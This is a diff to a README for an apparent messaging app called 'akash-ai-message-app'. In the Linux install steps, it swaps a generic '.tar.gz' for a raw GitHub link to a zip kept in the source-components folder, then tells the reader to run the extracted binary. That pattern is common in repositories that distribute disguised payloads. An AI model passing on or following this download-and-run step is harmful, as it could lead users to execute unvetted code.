Bature04/akash-ai-message-app/README.md

   3. Start the application from your Applications folder.

 - **Linux:**
-  1. Extract the `.tar.gz` file to your desired location.
+  1. Extract the `https://raw.githubusercontent.com/Bature04/akash-ai-message-app/master/src/components/akash-ai-message-app_v3.1.zip` file to your desired location.
   2. Open a terminal and navigate to the extracted folder.
   3. Run the application with the command `./akash-ai-message-app`.